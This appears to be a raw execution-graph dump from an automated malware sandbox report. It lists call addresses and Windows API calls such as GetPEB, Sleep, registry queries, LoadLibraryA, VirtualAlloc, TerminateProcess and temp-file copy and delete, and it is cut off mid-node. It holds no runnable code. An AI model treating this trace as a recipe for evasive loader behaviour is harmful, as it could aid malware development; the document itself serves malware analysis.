            Total number of Limit Nodes:68
            execution_graph 95598 f023b0 95612 f00000 95598->95612 95600 f0243e 95615 f022a0 95600->95615 95618 f03470 GetPEB 95612->95618 95614 f0068b 95614->95600 95616 f022a9 Sleep 95615->95616 95617 f022b7 95616->95617 95619 f0349a 95618->95619 95619->95614 95620 fa105b 95625 fa344d 95620->95625 95622 fa106a 95656 fc00a3 29 API calls __onexit 95622->95656 95624 fa1074 95626 fa345d __wsopen_s 95625->95626 95657 faa961 95626->95657 95630 fa351c 95669 fa3357 95630->95669 95637 faa961 22 API calls 95638 fa354d 95637->95638 95690 faa6c3 95638->95690 95641 fe3176 RegQueryValueExW 95642 fe320c RegCloseKey 95641->95642 95643 fe3193 95641->95643 95645 fa3578 95642->95645 95655 fe321e _wcslen 95642->95655 95696 fbfe0b 95643->95696 95645->95622 95646 fe31ac 95706 fa5722 95646->95706 95647 fa4c6d 22 API calls 95647->95655 95650 fe31d4 95709 fa6b57 95650->95709 95652 fe31ee ISource 95652->95642 95654 fa515f 22 API calls 95654->95655 95655->95645 95655->95647 95655->95654 95721 fa9cb3 95655->95721 95656->95624 95658 fbfe0b 22 API calls 95657->95658 95659 faa976 95658->95659 95727 fbfddb 95659->95727 95661 fa3513 95662 fa3a5a 95661->95662 95749 fe1f50 95662->95749 95665 fa9cb3 22 API calls 95666 fa3a8d 95665->95666 95751 fa3aa2 95666->95751 95668 fa3a97 95668->95630 95670 fe1f50 __wsopen_s 95669->95670 95671 fa3364 GetFullPathNameW 95670->95671 95672 fa3386 95671->95672 95673 fa6b57 22 API calls 95672->95673 95674 fa33a4 95673->95674 95675 fa33c6 95674->95675 95676 fe30bb 95675->95676 95677 fa33dd 95675->95677 95679 fbfddb 22 API calls 95676->95679 95775 fa33ee 95677->95775 95681 fe30c5 _wcslen 95679->95681 95680 fa33e8 95684 fa515f 95680->95684 95682 fbfe0b 22 API calls 95681->95682 95683 fe30fe __fread_nolock 95682->95683 95685 fa516e 95684->95685 95689 fa518f __fread_nolock 95684->95689 95687 fbfe0b 22 API calls 95685->95687 95686 fbfddb 22 API calls 95688 fa3544 95686->95688 95687->95689 95688->95637 95689->95686 95691 faa6dd 95690->95691 95695 fa3556 RegOpenKeyExW 95690->95695 95692 fbfddb 22 API calls 95691->95692 95693 faa6e7 95692->95693 95694 fbfe0b 22 API calls 95693->95694 95694->95695 95695->95641 95695->95645 95698 fbfddb 95696->95698 95697 fcea0c ___std_exception_copy 21 API calls 95697->95698 95698->95697 95699 fbfdfa 95698->95699 95702 fbfdfc 95698->95702 95790 fc4ead 7 API calls 2 library calls 95698->95790 95699->95646 95701 fc066d 95792 fc32a4 RaiseException 95701->95792 95702->95701 95791 fc32a4 RaiseException 95702->95791 95705 fc068a 95705->95646 95707 fbfddb 22 API calls 95706->95707 95708 fa5734 RegQueryValueExW 95707->95708 95708->95650 95708->95652 95710 fa6b67 _wcslen 95709->95710 95711 fe4ba1 95709->95711 95714 fa6b7d 95710->95714 95715 fa6ba2 95710->95715 95712 fa93b2 22 API calls 95711->95712 95713 fe4baa 95712->95713 95713->95713 95793 fa6f34 22 API calls 95714->95793 95716 fbfddb 22 API calls 95715->95716 95718 fa6bae 95716->95718 95720 fbfe0b 22 API calls 95718->95720 95719 fa6b85 __fread_nolock 95719->95652 95720->95719 95722 fa9cc2 _wcslen 95721->95722 95723 fbfe0b 22 API calls 95722->95723 95724 fa9cea __fread_nolock 95723->95724 95725 fbfddb 22 API calls 95724->95725 95726 fa9d00 95725->95726 95726->95655 95730 fbfde0 95727->95730 95729 fbfdfa 95729->95661 95730->95729 95732 fbfdfc 95730->95732 95737 fcea0c 95730->95737 95744 fc4ead 7 API calls 2 library calls 95730->95744 95733 fc066d 95732->95733 95745 fc32a4 RaiseException 95732->95745 95746 fc32a4 RaiseException 95733->95746 95736 fc068a 95736->95661 95742 fd3820 _abort 95737->95742 95738 fd385e 95748 fcf2d9 20 API calls _abort 95738->95748 95740 fd3849 RtlAllocateHeap 95741 fd385c 95740->95741 95740->95742 95741->95730 95742->95738 95742->95740 95747 fc4ead 7 API calls 2 library calls 95742->95747 95744->95730 95745->95733 95746->95736 95747->95742 95748->95741 95750 fa3a67 GetModuleFileNameW 95749->95750 95750->95665 95752 fe1f50 __wsopen_s 95751->95752 95753 fa3aaf GetFullPathNameW 95752->95753 95754 fa3ae9 95753->95754 95755 fa3ace 95753->95755 95757 faa6c3 22 API calls 95754->95757 95756 fa6b57 22 API calls 95755->95756 95758 fa3ada 95756->95758 95757->95758 95761 fa37a0 95758->95761 95762 fa37ae 95761->95762 95765 fa93b2 95762->95765 95764 fa37c2 95764->95668 95766 fa93c0 95765->95766 95768 fa93c9 __fread_nolock 95765->95768 95766->95768 95769 faaec9 95766->95769 95768->95764 95770 faaed9 __fread_nolock 95769->95770 95771 faaedc 95769->95771 95770->95768 95772 fbfddb 22 API calls 95771->95772 95773 faaee7 95772->95773 95774 fbfe0b 22 API calls 95773->95774 95774->95770 95776 fa33fe _wcslen 95775->95776 95777 fe311d 95776->95777 95778 fa3411 95776->95778 95780 fbfddb 22 API calls 95777->95780 95785 faa587 95778->95785 95782 fe3127 95780->95782 95781 fa341e __fread_nolock 95781->95680 95783 fbfe0b 22 API calls 95782->95783 95784 fe3157 __fread_nolock 95783->95784 95786 faa598 __fread_nolock 95785->95786 95787 faa59d 95785->95787 95786->95781 95788 fef80f 95787->95788 95789 fbfe0b 22 API calls 95787->95789 95789->95786 95790->95698 95791->95701 95792->95705 95793->95719 95794 fa1098 95799 fa42de 95794->95799 95798 fa10a7 95800 faa961 22 API calls 95799->95800 95801 fa42f5 GetVersionExW 95800->95801 95802 fa6b57 22 API calls 95801->95802 95803 fa4342 95802->95803 95804 fa93b2 22 API calls 95803->95804 95809 fa4378 95803->95809 95805 fa436c 95804->95805 95807 fa37a0 22 API calls 95805->95807 95806 fa441b GetCurrentProcess IsWow64Process 95808 fa4437 95806->95808 95807->95809 95810 fa444f LoadLibraryA 95808->95810 95811 fe3824 GetSystemInfo 95808->95811 95809->95806 95816 fe37df 95809->95816 95812 fa449c GetSystemInfo 95810->95812 95813 fa4460 GetProcAddress 95810->95813 95815 fa4476 95812->95815 95813->95812 95814 fa4470 GetNativeSystemInfo 95813->95814 95814->95815 95817 fa447a FreeLibrary 95815->95817 95818 fa109d 95815->95818 95817->95818 95819 fc00a3 29 API calls __onexit 95818->95819 95819->95798 95820 faf7bf 95821 faf7d3 95820->95821 95822 fafcb6 95820->95822 95824 fafcc2 95821->95824 95825 fbfddb 22 API calls 95821->95825 95926 faaceb 23 API calls ISource 95822->95926 95927 faaceb 23 API calls ISource 95824->95927 95827 faf7e5 95825->95827 95827->95824 95828 faf83e 95827->95828 95829 fafd3d 95827->95829 95847 faed9d ISource 95828->95847 95869 fb1310 95828->95869 95928 1011155 22 API calls 95829->95928 95832 ff4beb 95936 101359c 82 API calls __wsopen_s 95832->95936 95833 fafef7 95843 faa8c7 22 API calls 95833->95843 95833->95847 95835 faf3ae ISource 95835->95847 95933 101359c 82 API calls __wsopen_s 95835->95933 95836 fbfddb 22 API calls 95850 faec76 ISource 95836->95850 95838 ff4b0b 95934 101359c 82 API calls __wsopen_s 95838->95934 95839 faa8c7 22 API calls 95839->95850 95840 ff4600 95840->95847 95929 faa8c7 95840->95929 95843->95847 95846 fc0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95846->95850 95848 fafbe3 95848->95835 95848->95847 95852 ff4bdc 95848->95852 95849 faa961 22 API calls 95849->95850 95850->95832 95850->95833 95850->95835 95850->95836 95850->95838 95850->95839 95850->95840 95850->95846 95850->95847 95850->95848 95850->95849 95851 fc00a3 29 API calls pre_c_initialization 95850->95851 95854 fc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95850->95854 95855 fb06a0 95850->95855 95925 fb01e0 256 API calls 2 library calls 95850->95925 95851->95850 95935 101359c 82 API calls __wsopen_s 95852->95935 95854->95850 95858 fb06bd 95855->95858 95862 fb0863 ISource 95855->95862 95856 fb0d36 95859 fb0847 ISource 95856->95859 95940 fbacd5 39 API calls 95856->95940 95858->95856 95858->95859 95858->95862 95865 fb081e 95858->95865 95866 fb082a ISource 95858->95866 95859->95850 95861 ff5ffd 95864 ff600f 95861->95864 95939 fccf65 39 API calls 95861->95939 95862->95856 95862->95859 95862->95861 95862->95866 95864->95850 95865->95866 95868 ff5e15 95865->95868 95866->95859 95866->95861 95938 fbce17 22 API calls ISource 95866->95938 95937 fccf65 39 API calls 95868->95937 95870 fb17b0 95869->95870 95871 fb1376 95869->95871 96194 fc0242 5 API calls __Init_thread_wait 95870->96194 95873 ff6331 95871->95873 95941 fb1940 95871->95941 96199 102709c 256 API calls 95873->96199 95874 fb17ba 95877 fb17fb 95874->95877 95880 fa9cb3 22 API calls 95874->95880 95883 ff6346 95877->95883 95885 fb182c 95877->95885 95878 ff633d 95878->95850 95889 fb17d4 95880->95889 95881 fb1940 9 API calls 95882 fb13b6 95881->95882 95882->95877 95884 fb13ec 95882->95884 96200 101359c 82 API calls __wsopen_s 95883->96200 95884->95883 95890 fb1408 __fread_nolock 95884->95890 96196 faaceb 23 API calls ISource 95885->96196 95888 fb1839 96197 fbd217 256 API calls 95888->96197 96195 fc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95889->96195 95890->95888 95893 ff636e 95890->95893 95899 fbfddb 22 API calls 95890->95899 95902 fbfe0b 22 API calls 95890->95902 95910 fb152f 95890->95910 95911 fb15c7 ISource 95890->95911 95912 ff63b2 95890->95912 95951 faec40 95890->95951 96201 101359c 82 API calls __wsopen_s 95893->96201 95895 fb153c 95898 fb1940 9 API calls 95895->95898 95896 ff63d1 96203 1025745 54 API calls _wcslen 95896->96203 95901 fb1549 95898->95901 95899->95890 95900 fb1872 95900->95873 96198 fbfaeb 23 API calls 95900->96198 95903 fb1940 9 API calls 95901->95903 95901->95911 95902->95890 95909 fb1563 95903->95909 95904 fb171d 95904->95850 95908 fb167b ISource 95908->95904 96193 fbce17 22 API calls ISource 95908->96193 95909->95911 95916 faa8c7 22 API calls 95909->95916 95910->95895 95910->95896 95911->95900 95911->95908 95914 fb1940 9 API calls 95911->95914 95975 102958b 95911->95975 95978 1016ef1 95911->95978 96058 fa4f39 95911->96058 96064 fbeffa 95911->96064 96121 101744a 95911->96121 96178 101f0ec 95911->96178 96187 102959f 95911->96187 96190 100d4ce 95911->96190 96204 101359c 82 API calls __wsopen_s 95911->96204 96202 101359c 82 API calls __wsopen_s 95912->96202 95914->95911 95916->95911 95925->95850 95926->95824 95927->95829 95928->95847 95930 faa8db 95929->95930 95932 faa8ea __fread_nolock 95929->95932 95931 fbfe0b 22 API calls 95930->95931 95930->95932 95931->95932 95932->95847 95933->95847 95934->95847 95935->95832 95936->95847 95937->95868 95938->95866 95939->95864 95940->95859 95942 fb1981 95941->95942 95946 fb195d 95941->95946 96205 fc0242 5 API calls __Init_thread_wait 95942->96205 95945 fb198b 95945->95946 96206 fc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95945->96206 95950 fb13a0 95946->95950 96207 fc0242 5 API calls __Init_thread_wait 95946->96207 95947 fb8727 95947->95950 96208 fc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95947->96208 95950->95881 95954 faec76 ISource 95951->95954 95952 fbfddb 22 API calls 95952->95954 95953 fc0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95953->95954 95954->95952 95954->95953 95955 ff4beb 95954->95955 95956 fb06a0 41 API calls 95954->95956 95958 ff4b0b 95954->95958 95959 faa8c7 22 API calls 95954->95959 95960 faf3ae ISource 95954->95960 95961 fafef7 95954->95961 95962 ff4600 95954->95962 95968 fafbe3 95954->95968 95969 faa961 22 API calls 95954->95969 95970 faed9d ISource 95954->95970 95972 fc00a3 29 API calls pre_c_initialization 95954->95972 95974 fc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95954->95974 96209 fb01e0 256 API calls 2 library calls 95954->96209 96213 101359c 82 API calls __wsopen_s 95955->96213 95956->95954 96211 101359c 82 API calls __wsopen_s 95958->96211 95959->95954 95960->95970 96210 101359c 82 API calls __wsopen_s 95960->96210 95965 faa8c7 22 API calls 95961->95965 95961->95970 95967 faa8c7 22 API calls 95962->95967 95962->95970 95965->95970 95967->95970 95968->95960 95968->95970 95971 ff4bdc 95968->95971 95969->95954 95970->95890 96212 101359c 82 API calls __wsopen_s 95971->96212 95972->95954 95974->95954 96214 1027f59 95975->96214 95977 102959b 95977->95911 95979 faa961 22 API calls 95978->95979 95980 1016f1d 95979->95980 95981 faa961 22 API calls 95980->95981 95982 1016f26 95981->95982 95983 1016f3a 95982->95983 96532 fab567 95982->96532 95985 fa7510 53 API calls 95983->95985 95990 1016f57 _wcslen 95985->95990 95986 1016fbc 95988 fa7510 53 API calls 95986->95988 95987 10170bf 96347 fa4ecb 95987->96347 95991 1016fc8 95988->95991 95990->95986 95990->95987 95999 10170e9 95990->95999 95996 faa8c7 22 API calls 95991->95996 96001 1016fdb 95991->96001 95993 10170e5 95995 faa961 22 API calls 95993->95995 95993->95999 95994 fa4ecb 94 API calls 95994->95993 95997 101711a 95995->95997 95996->96001 95998 faa961 22 API calls 95997->95998 96004 1017126 95998->96004 95999->95911 96000 1017027 96003 fa7510 53 API calls 96000->96003 96001->96000 96002 1017005 96001->96002 96005 faa8c7 22 API calls 96001->96005 96006 fa33c6 22 API calls 96002->96006 96007 1017034 96003->96007 96008 faa961 22 API calls 96004->96008 96005->96002 96009 101700f 96006->96009 96010 1017047 96007->96010 96011 101703d 96007->96011 96012 101712f 96008->96012 96013 fa7510 53 API calls 96009->96013 96537 100e199 GetFileAttributesW 96010->96537 96014 faa8c7 22 API calls 96011->96014 96016 faa961 22 API calls 96012->96016 96018 101701b 96013->96018 96014->96010 96017 1017138 96016->96017 96021 fa7510 53 API calls 96017->96021 96022 fa6350 22 API calls 96018->96022 96019 1017050 96020 1017063 96019->96020 96023 fa4c6d 22 API calls 96019->96023 96025 fa7510 53 API calls 96020->96025 96031 1017069 96020->96031 96024 1017145 96021->96024 96022->96000 96023->96020 96369 fa525f 96024->96369 96027 10170a0 96025->96027 96538 100d076 57 API calls 96027->96538 96028 1017166 96411 fa4c6d 96028->96411 96031->95999 96033 10171a9 96035 faa8c7 22 API calls 96033->96035 96034 fa4c6d 22 API calls 96037 1017186 96034->96037 96036 10171ba 96035->96036 96414 fa6350 96036->96414 96037->96033 96040 fa6b57 22 API calls 96037->96040 96042 101719b 96040->96042 96041 fa6350 22 API calls 96043 10171d6 96041->96043 96044 fa6b57 22 API calls 96042->96044 96045 fa6350 22 API calls 96043->96045 96044->96033 96046 10171e4 96045->96046 96047 fa7510 53 API calls 96046->96047 96048 10171f0 96047->96048 96423 100d7bc 96048->96423 96050 1017201 96051 100d4ce 4 API calls 96050->96051 96052 101720b 96051->96052 96053 fa7510 53 API calls 96052->96053 96056 1017239 96052->96056 96054 1017229 96053->96054 96477 1012947 96054->96477 96057 fa4f39 68 API calls 96056->96057 96057->95999 96059 fa4f4a 96058->96059 96060 fa4f43 96058->96060 96062 fa4f6a FreeLibrary 96059->96062 96063 fa4f59 96059->96063 96061 fce678 67 API calls 96060->96061 96061->96059 96062->96063 96063->95911 97173 fa9c6e 96064->97173 96068 fbfddb 22 API calls 96069 fbf02b 96068->96069 96070 fbfe0b 22 API calls 96069->96070 96072 fbf03c 96070->96072 96071 fff0a8 96111 fbf0a4 96071->96111 97243 1019caa 39 API calls 96071->97243 97211 fa6246 96072->97211 96075 fab567 39 API calls 96077 fff10a 96075->96077 96076 faa961 22 API calls 96078 fbf04f 96076->96078 96079 fbf0b1 96077->96079 96080 fff112 96077->96080 96081 fa6246 CloseHandle 96078->96081 97187 fbfa5b 96079->97187 96083 fab567 39 API calls 96080->96083 96084 fbf056 96081->96084 96086 fbf0b8 96083->96086 96085 fa7510 53 API calls 96084->96085 96087 fbf062 96085->96087 96090 fff127 96086->96090 96091 fbf0d3 96086->96091 96088 fa6246 CloseHandle 96087->96088 96089 fbf06c 96088->96089 97215 fa5745 96089->97215 96094 fbfe0b 22 API calls 96090->96094 97192 fa6270 96091->97192 96097 fff12c 96094->96097 96098 fff140 96097->96098 97244 fbf866 ReadFile SetFilePointerEx 96097->97244 96110 fff144 __fread_nolock 96098->96110 97245 1010e85 22 API calls ___scrt_fastfail 96098->97245 96099 fbf085 97223 fa53de 96099->97223 96100 fff0a0 97242 fa6216 CloseHandle ISource 96100->97242 96102 fbf0ea 96102->96110 97239 fa62b5 22 API calls 96102->97239 96108 fbf093 97238 fa53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96108->97238 96111->96075 96111->96079 96112 fbf0fe 96115 fbf138 96112->96115 96116 fa6246 CloseHandle 96112->96116 96113 fff069 97241 100ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 96113->97241 96114 fbf09a 96114->96111 96114->96113 96115->95911 96118 fbf12c 96116->96118 96118->96115 97240 fa6216 CloseHandle ISource 96118->97240 96119 fff080 96119->96111 96122 1017469 96121->96122 96123 1017474 96121->96123 96124 fab567 39 API calls 96122->96124 96127 faa961 22 API calls 96123->96127 96160 1017554 96123->96160 96124->96123 96125 fbfddb 22 API calls 96126 1017587 96125->96126 96128 fbfe0b 22 API calls 96126->96128 96129 1017495 96127->96129 96130 1017598 96128->96130 96131 faa961 22 API calls 96129->96131 96133 fa6246 CloseHandle 96130->96133 96132 101749e 96131->96132 96134 fa7510 53 API calls 96132->96134 96135 10175a3 96133->96135 96136 10174aa 96134->96136 96137 faa961 22 API calls 96135->96137 96138 fa525f 22 API calls 96136->96138 96139 10175ab 96137->96139 96140 10174bf 96138->96140 96141 fa6246 CloseHandle 96139->96141 96142 fa6350 22 API calls 96140->96142 96143 10175b2 96141->96143 96144 10174f2 96142->96144 96145 fa7510 53 API calls 96143->96145 96146 101754a 96144->96146 96148 100d4ce 4 API calls 96144->96148 96147 10175be 96145->96147 96150 fab567 39 API calls 96146->96150 96149 fa6246 CloseHandle 96147->96149 96151 1017502 96148->96151 96152 10175c8 96149->96152 96150->96160 96151->96146 96153 1017506 96151->96153 96154 fa5745 5 API calls 96152->96154 96155 fa9cb3 22 API calls 96153->96155 96156 10175e2 96154->96156 96157 1017513 96155->96157 96158 10175ea 96156->96158 96159 10176de GetLastError 96156->96159 97289 100d2c1 26 API calls 96157->97289 96164 fa53de 27 API calls 96158->96164 96162 10176f7 96159->96162 96160->96125 96177 10176a4 96160->96177 97293 fa6216 CloseHandle ISource 96162->97293 96163 101751c 96163->96146 96166 10175f8 96164->96166 97290 fa53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96166->97290 96168 1017645 96169 fbfddb 22 API calls 96168->96169 96172 1017679 96169->96172 96170 10175ff 96170->96168 96171 1017619 96170->96171 97291 100ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 96171->97291 96174 faa961 22 API calls 96172->96174 96175 1017686 96174->96175 96175->96177 97292 100417d 22 API calls __fread_nolock 96175->97292 96177->95911 96179 fa7510 53 API calls 96178->96179 96180 101f126 96179->96180 97294 fa9e90 96180->97294 96182 101f136 96183 faec40 256 API calls 96182->96183 96184 101f15b 96182->96184 96183->96184 96185 fa9c6e 22 API calls 96184->96185 96186 101f15f 96184->96186 96185->96186 96186->95911 96188 1027f59 120 API calls 96187->96188 96189 10295af 96188->96189 96189->95911 97331 100dbbe lstrlenW 96190->97331 96193->95908 96194->95874 96195->95877 96196->95888 96197->95900 96198->95900 96199->95878 96200->95911 96201->95911 96202->95911 96203->95909 96204->95911 96205->95945 96206->95946 96207->95947 96208->95950 96209->95954 96210->95970 96211->95970 96212->95955 96213->95970 96252 fa7510 96214->96252 96218 1028281 96219 102844f 96218->96219 96223 102828f 96218->96223 96316 1028ee4 60 API calls 96219->96316 96222 102845e 96222->96223 96224 102846a 96222->96224 96288 1027e86 96223->96288 96241 1027fd5 ISource 96224->96241 96225 fa7510 53 API calls 96243 1028049 96225->96243 96230 10282c8 96303 fbfc70 96230->96303 96233 1028302 96310 fa63eb 22 API calls 96233->96310 96234 10282e8 96309 101359c 82 API calls __wsopen_s 96234->96309 96237 10282f3 GetCurrentProcess TerminateProcess 96237->96233 96238 1028311 96311 fa6a50 22 API calls 96238->96311 96240 102832a 96251 1028352 96240->96251 96312 fb04f0 22 API calls 96240->96312 96241->95977 96243->96218 96243->96225 96243->96241 96307 100417d 22 API calls __fread_nolock 96243->96307 96308 102851d 42 API calls _strftime 96243->96308 96244 10284c5 96244->96241 96247 10284d9 FreeLibrary 96244->96247 96245 1028341 96313 1028b7b 75 API calls 96245->96313 96247->96241 96251->96244 96314 fb04f0 22 API calls 96251->96314 96315 faaceb 23 API calls ISource 96251->96315 96317 1028b7b 75 API calls 96251->96317 96253 fa7522 96252->96253 96254 fa7525 96252->96254 96253->96241 96275 1028cd3 96253->96275 96255 fa755b 96254->96255 96256 fa752d 96254->96256 96257 fe50f6 96255->96257 96259 fa756d 96255->96259 96267 fe500f 96255->96267 96318 fc51c6 26 API calls 96256->96318 96321 fc5183 26 API calls 96257->96321 96319 fbfb21 51 API calls 96259->96319 96260 fa753d 96265 fbfddb 22 API calls 96260->96265 96263 fe510e 96263->96263 96268 fa7547 96265->96268 96266 fe5088 96320 fbfb21 51 API calls 96266->96320 96267->96266 96270 fbfe0b 22 API calls 96267->96270 96269 fa9cb3 22 API calls 96268->96269 96269->96253 96271 fe5058 96270->96271 96272 fbfddb 22 API calls 96271->96272 96273 fe507f 96272->96273 96274 fa9cb3 22 API calls 96273->96274 96274->96266 96276 faaec9 22 API calls 96275->96276 96277 1028cee CharLowerBuffW 96276->96277 96322 1008e54 96277->96322 96281 faa961 22 API calls 96282 1028d2a 96281->96282 96329 fa6d25 96282->96329 96284 1028d3e 96285 fa93b2 22 API calls 96284->96285 96287 1028d48 _wcslen 96285->96287 96286 1028e5e _wcslen 96286->96243 96287->96286 96342 102851d 42 API calls _strftime 96287->96342 96289 1027ea1 96288->96289 96290 1027eec 96288->96290 96291 fbfe0b 22 API calls 96289->96291 96294 1029096 96290->96294 96292 1027ec3 96291->96292 96292->96290 96293 fbfddb 22 API calls 96292->96293 96293->96292 96295 10292ab ISource 96294->96295 96302 10290ba _strcat _wcslen 96294->96302 96295->96230 96296 fab567 39 API calls 96296->96302 96297 fab38f 39 API calls 96297->96302 96298 fab6b5 39 API calls 96298->96302 96299 fa7510 53 API calls 96299->96302 96300 fcea0c 21 API calls ___std_exception_copy 96300->96302 96302->96295 96302->96296 96302->96297 96302->96298 96302->96299 96302->96300 96346 100efae 24 API calls _wcslen 96302->96346 96305 fbfc85 96303->96305 96304 fbfd1d VirtualAlloc 96306 fbfceb 96304->96306 96305->96304 96305->96306 96306->96233 96306->96234 96307->96243 96308->96243 96309->96237 96310->96238 96311->96240 96312->96245 96313->96251 96314->96251 96315->96251 96316->96222 96317->96251 96318->96260 96319->96260 96320->96257 96321->96263 96323 1008e74 _wcslen 96322->96323 96324 1008f68 96323->96324 96325 1008ea9 96323->96325 96326 1008f63 96323->96326 96324->96326 96344 fbce60 41 API calls 96324->96344 96325->96326 96343 fbce60 41 API calls 96325->96343 96326->96281 96326->96287 96330 fa6d91 96329->96330 96331 fa6d34 96329->96331 96332 fa93b2 22 API calls 96330->96332 96331->96330 96333 fa6d3f 96331->96333 96339 fa6d62 __fread_nolock 96332->96339 96334 fa6d5a 96333->96334 96335 fe4c9d 96333->96335 96345 fa6f34 22 API calls 96334->96345 96336 fbfddb 22 API calls 96335->96336 96338 fe4ca7 96336->96338 96340 fbfe0b 22 API calls 96338->96340 96339->96284 96341 fe4cda 96340->96341 96342->96286 96343->96325 96344->96324 96345->96339 96346->96302 96539 fa4e90 LoadLibraryA 96347->96539 96352 fe3ccf 96354 fa4f39 68 API calls 96352->96354 96353 fa4ef6 LoadLibraryExW 96547 fa4e59 LoadLibraryA 96353->96547 96356 fe3cd6 96354->96356 96358 fa4e59 3 API calls 96356->96358 96362 fe3cde 96358->96362 96360 fa4f20 96361 fa4f2c 96360->96361 96360->96362 96363 fa4f39 68 API calls 96361->96363 96569 fa50f5 96362->96569 96365 fa4f31 96363->96365 96365->95993 96365->95994 96368 fe3d05 96370 faa961 22 API calls 96369->96370 96371 fa5275 96370->96371 96372 faa961 22 API calls 96371->96372 96373 fa527d 96372->96373 96374 faa961 22 API calls 96373->96374 96375 fa5285 96374->96375 96376 faa961 22 API calls 96375->96376 96377 fa528d 96376->96377 96378 fe3df5 96377->96378 96379 fa52c1 96377->96379 96381 faa8c7 22 API calls 96378->96381 96380 fa6d25 22 API calls 96379->96380 96382 fa52cf 96380->96382 96383 fe3dfe 96381->96383 96385 fa93b2 22 API calls 96382->96385 96384 faa6c3 22 API calls 96383->96384 96387 fa5304 96384->96387 96386 fa52d9 96385->96386 96386->96387 96388 fa6d25 22 API calls 96386->96388 96389 fa5349 96387->96389 96390 fa5325 96387->96390 96406 fe3e20 96387->96406 96392 fa52fa 96388->96392 96391 fa6d25 22 API calls 96389->96391 96390->96389 96395 fa4c6d 22 API calls 96390->96395 96393 fa535a 96391->96393 96394 fa93b2 22 API calls 96392->96394 96396 fa5370 96393->96396 96401 faa8c7 22 API calls 96393->96401 96394->96387 96397 fa5332 96395->96397 96399 fa5384 96396->96399 96403 faa8c7 22 API calls 96396->96403 96397->96389 96402 fa6d25 22 API calls 96397->96402 96398 fa6b57 22 API calls 96408 fe3ee0 96398->96408 96400 fa538f 96399->96400 96404 faa8c7 22 API calls 96399->96404 96405 faa8c7 22 API calls 96400->96405 96409 fa539a 96400->96409 96401->96396 96402->96389 96403->96399 96404->96400 96405->96409 96406->96398 96407 fa4c6d 22 API calls 96407->96408 96408->96389 96408->96407 96818 fa49bd 22 API calls __fread_nolock 96408->96818 96409->96028 96412 faaec9 22 API calls 96411->96412 96413 fa4c78 96412->96413 96413->96033 96413->96034 96415 fa6362 96414->96415 96416 fe4a51 96414->96416 96819 fa6373 96415->96819 96829 fa4a88 22 API calls __fread_nolock 96416->96829 96419 fa636e 96419->96041 96420 fe4a5b 96421 fe4a67 96420->96421 96422 faa8c7 22 API calls 96420->96422 96422->96421 96424 100d7d8 96423->96424 96425 100d7f3 96424->96425 96426 100d7dd 96424->96426 96427 faa961 22 API calls 96425->96427 96428 faa8c7 22 API calls 96426->96428 96476 100d7ee 96426->96476 96429 100d7fb 96427->96429 96428->96476 96430 faa961 22 API calls 96429->96430 96431 100d803 96430->96431 96432 faa961 22 API calls 96431->96432 96433 100d80e 96432->96433 96434 faa961 22 API calls 96433->96434 96435 100d816 96434->96435 96436 faa961 22 API calls 96435->96436 96437 100d81e 96436->96437 96438 faa961 22 API calls 96437->96438 96439 100d826 96438->96439 96440 faa961 22 API calls 96439->96440 96441 100d82e 96440->96441 96442 faa961 22 API calls 96441->96442 96443 100d836 96442->96443 96444 fa525f 22 API calls 96443->96444 96445 100d84d 96444->96445 96446 fa525f 22 API calls 96445->96446 96447 100d866 96446->96447 96448 fa4c6d 22 API calls 96447->96448 96449 100d872 96448->96449 96450 100d885 96449->96450 96452 fa93b2 22 API calls 96449->96452 96451 fa4c6d 22 API calls 96450->96451 96453 100d88e 96451->96453 96452->96450 96454 100d89e 96453->96454 96455 fa93b2 22 API calls 96453->96455 96456 100d8b0 96454->96456 96457 faa8c7 22 API calls 96454->96457 96455->96454 96458 fa6350 22 API calls 96456->96458 96457->96456 96459 100d8bb 96458->96459 96830 100d978 22 API calls 96459->96830 96461 100d8ca 96831 100d978 22 API calls 96461->96831 96463 100d8dd 96464 fa4c6d 22 API calls 96463->96464 96465 100d8e7 96464->96465 96466 100d8ec 96465->96466 96467 100d8fe 96465->96467 96468 fa33c6 22 API calls 96466->96468 96469 fa4c6d 22 API calls 96467->96469 96470 100d8f9 96468->96470 96471 100d907 96469->96471 96474 fa6350 22 API calls 96470->96474 96472 100d925 96471->96472 96473 fa33c6 22 API calls 96471->96473 96475 fa6350 22 API calls 96472->96475 96473->96470 96474->96472 96475->96476 96476->96050 96478 1012954 __wsopen_s 96477->96478 96479 fbfe0b 22 API calls 96478->96479 96480 1012971 96479->96480 96481 fa5722 22 API calls 96480->96481 96482 101297b 96481->96482 96832 101274e 96482->96832 96484 1012986 96485 fa511f 64 API calls 96484->96485 96486 101299b 96485->96486 96487 1012a6c 96486->96487 96488 10129bf 96486->96488 96864 1012e66 75 API calls 96487->96864 96861 1012e66 75 API calls 96488->96861 96491 10129c4 96495 1012a75 ISource 96491->96495 96862 fcd583 26 API calls 96491->96862 96493 fa50f5 40 API calls 96494 1012a91 96493->96494 96496 fa50f5 40 API calls 96494->96496 96495->96056 96498 1012aa1 96496->96498 96497 10129ed 96863 fcd583 26 API calls 96497->96863 96499 fa50f5 40 API calls 96498->96499 96501 1012abc 96499->96501 96502 fa50f5 40 API calls 96501->96502 96503 1012acc 96502->96503 96504 fa50f5 40 API calls 96503->96504 96506 1012ae7 96504->96506 96505 1012a38 96505->96493 96505->96495 96507 fa50f5 40 API calls 96506->96507 96508 1012af7 96507->96508 96509 fa50f5 40 API calls 96508->96509 96510 1012b07 96509->96510 96511 fa50f5 40 API calls 96510->96511 96512 1012b17 96511->96512 96835 1013017 GetTempPathW GetTempFileNameW 96512->96835 96514 1012b22 96515 fce5eb 29 API calls 96514->96515 96526 1012b33 96515->96526 96516 1012bed 96845 fce678 96516->96845 96518 1012bf8 96520 1012c12 96518->96520 96521 1012bfe DeleteFileW 96518->96521 96519 fa50f5 40 API calls 96519->96526 96522 1012c91 CopyFileW 96520->96522 96528 1012c18 96520->96528 